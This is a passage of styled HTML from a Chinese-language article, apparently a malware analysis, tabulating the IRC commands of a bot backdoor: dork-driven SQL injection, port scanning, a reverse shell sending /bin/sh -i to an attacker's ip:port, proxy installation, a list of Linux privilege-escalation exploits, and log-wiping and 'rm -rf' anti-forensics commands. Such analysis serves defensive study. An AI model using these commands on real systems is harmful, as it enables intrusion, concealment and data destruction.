style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u sql2 &lt;vuln&gt; &lt;dork&gt; &lt;columns&gt;</span></span></p></td><td data-colwidth="473" width="473" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">Google Dork </span><font face="宋体"><span leaf="">→ </span></font><font face="var(--monospace)"><span leaf="">多搜索引擎 </span></font><font face="宋体"><span leaf="">→ </span></font><font face="var(--monospace)"><span leaf="">SQL注入</span></font></span></p></td></tr><tr><td data-colwidth="379" width="379" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u portscan &lt;ip&gt;</span></span></p></td><td data-colwidth="473" width="473" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><font face="var(--monospace)"><span leaf="">扫描</span></font><span leaf=""> 70+ 常用端口 (15-55555)</span></span></p></td></tr><tr><td data-colwidth="379" width="379" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u nmap &lt;ip&gt; &lt;begin&gt; &lt;end&gt;</span></span></p></td><td data-colwidth="473" width="473" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><font face="var(--monospace)"><span leaf="">指定端口范围扫描</span></font></span></p></td></tr><tr><td data-colwidth="379" width="379" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u autoscan &lt;kw&gt; &lt;url&gt; &lt;script&gt; &lt;interval&gt;</span></span></p></td><td data-colwidth="473" width="473" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><font face="var(--monospace)"><span leaf="">自动化</span></font><span leaf=""> Web 扫描器</span></span></p></td></tr></tbody></table><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-weight: bold;">后门/访问命令</span></span></p><table style="border-collapse:collapse;width:426.1000pt;border:none;mso-border-left-alt:0.5000pt solid rgb(223,226,229);mso-border-top-alt:0.5000pt solid rgb(223,226,229);mso-border-right-alt:0.5000pt solid rgb(223,226,229);mso-border-bottom-alt:0.5000pt solid rgb(223,226,229);mso-padding-alt:0.0000pt 0.0000pt 0.0000pt 0.0000pt;"><tbody><tr><td data-colwidth="326" width="326" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt medium;border-style: solid solid none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><b><span style="font-family:宋体;font-weight:bold;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">命令</span></font></span></b></p></td><td data-colwidth="525" width="525" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt medium medium;border-style: solid solid none none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) currentcolor currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><b><span style="font-family:宋体;font-weight:bold;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">功能</span></font></span></b></p></td></tr><tr><td data-colwidth="326" width="326" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt;border-style: solid;border-color: rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u cback &lt;ip&gt; &lt;port&gt;</span></span></p></td><td data-colwidth="525" width="525" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt 1pt medium;border-style: solid solid solid none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><font face="var(--monospace)"><span leaf="">反向</span></font><span leaf=""> Shell </span><font face="宋体"><span leaf="">→ </span></font></span><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">/bin/sh -i</span></span><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><font face="var(--monospace)"><span leaf="">重定向到攻击者</span></font><span leaf=""> ip:port</span></span></p></td></tr><tr><td data-colwidth="326" width="326" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u socks5</span></span></p></td><td data-colwidth="525" width="525" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><font face="var(--monospace)"><span leaf="">自动安装</span></font><span leaf=""> SOCKS5 代理 (下载 mocks + 配置 + 启动)</span></span></p></td></tr><tr><td data-colwidth="326" width="326" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u system</span></span></p></td><td data-colwidth="525" width="525" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><font face="var(--monospace)"><span leaf="">显示系统信息</span></font></span><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">nproc</span></span><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">hostname</span></span><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">uname -a</span></span><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">uptime</span></span><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">pwd</span></span><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">id</span></span></p></td></tr><tr><td data-colwidth="326" width="326" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u sys</span></span></p></td><td data-colwidth="525" width="525" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><font face="var(--monospace)"><span leaf="">同上</span></font><span leaf=""> (详细版)</span></span></p></td></tr><tr><td data-colwidth="326" width="326" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u sendmail &lt;subj&gt; &lt;from&gt; &lt;to&gt; &lt;msg&gt;</span></span></p></td><td data-colwidth="525" width="525" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><font face="var(--monospace)"><span leaf="">发送邮件</span></font><span leaf=""> (</span></span><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">/usr/sbin/sendmail</span></span><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">)</span></span></p></td></tr></tbody></table><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-weight: bold;">权限提升检测 (unixable)</span></span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">检查 30+ Linux 内核漏洞的本地提权可能: w00t, brk, ave, elflbl, elfdump, expand_stack, h00lyshit, kdump, km2, krad, krad3, local26, loko, mremap_pte, newlocal, ong_bak, ptrace, ptrace_kmod, ptrace24, pwned, py2, raptor_prctl, prctl3, remap, rip, stackgrow2, uselib24, newsmp, smpracer, loginx, exp.sh, prctl, kmdx, raptor, raptor2</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-weight: bold;">反取证命令</span></span></p><table style="border-collapse:collapse;width:426.1000pt;border:none;mso-border-left-alt:0.5000pt solid rgb(223,226,229);mso-border-top-alt:0.5000pt solid rgb(223,226,229);mso-border-right-alt:0.5000pt solid rgb(223,226,229);mso-border-bottom-alt:0.5000pt solid rgb(223,226,229);mso-padding-alt:0.0000pt 0.0000pt 0.0000pt 0.0000pt;"><tbody><tr><td data-colwidth="243" width="243" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt medium;border-style: solid solid none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><b><span style="font-family:宋体;font-weight:bold;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">命令</span></font></span></b></p></td><td data-colwidth="608" width="608" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt medium medium;border-style: solid solid none none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) currentcolor currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><b><span style="font-family:宋体;font-weight:bold;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">功能</span></font></span></b></p></td></tr><tr><td data-colwidth="243" width="243" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt;border-style: solid;border-color: rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u logcleaner</span></span><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">+ </span></span><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u no</span></span></p></td><td data-colwidth="608" width="608" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt 1pt medium;border-style: solid solid solid none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><font face="var(--monospace)"><span leaf="">删除</span></font></span><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">/var/log/*</span></span><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">/var/adm/*</span></span><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">apache日志 </span></span><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">.bash_history</span></span></p></td></tr><tr><td data-colwidth="243" width="243" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u cleartmp</span></span><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">+ </span></span><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u no</span></span></p></td><td data-colwidth="608" width="608" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">cd /tmp; rm -rf *</span></span></p></td></tr></tbody></table><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-weight: bold;">IRC 管理命令</span></span></p><table style="border-collapse:collapse;width:426.1000pt;border:none;mso-border-left-alt:0.5000pt solid rgb(223,226,229);mso-border-top-alt:0.5000pt solid rgb(223,226,229);mso-border-right-alt:0.5000pt solid rgb(223,226,229);mso-border-bottom-alt:0.5000pt solid rgb(223,226,229);mso-padding-alt:0.0000pt 0.0000pt 0.0000pt 0.0000pt;"><tbody><tr><td data-colwidth="626" width="626" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt medium;border-style: solid solid none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><b><span style="font-family:宋体;font-weight:bold;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">命令</span></font></span></b></p></td><td data-colwidth="225" width="225" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt medium medium;border-style: solid solid none none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) currentcolor currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><b><span style="font-family:宋体;font-weight:bold;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">功能</span></font></span></b></p></td></tr><tr><td data-colwidth="626" width="626" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt;border-style: solid;border-color: rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u killme</span></span></p></td><td data-colwidth="225" width="225" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt 1pt medium;border-style: solid solid solid none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><font face="var(--monospace)"><span leaf="">自杀</span></font><span leaf=""> (</span></span><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">kill -9 &lt;pid&gt;</span></span><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">)</span></span></p></td></tr><tr><td data-colwidth="626" width="626" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u join &lt;<a class="wx_topic_link" topic-id="mp2ikykt-8w8dfj" style="color: #576B95 !important;" data-topic="1" data-recommend="">#chan</a>&gt;</span></span><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">/ </span></span><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u part &lt;<a class="wx_topic_link" topic-id="mp2ikykt-qvg0p3" style="color: #576B95 !important;" data-topic="1" data-recommend="">#chan</a>&gt;</span></span></p></td><td data-colwidth="225" width="225" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><font face="var(--monospace)"><span leaf="">加入</span></font><span leaf="">/离开频道</span></span></p></td></tr><tr><td data-colwidth="626" width="626" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span 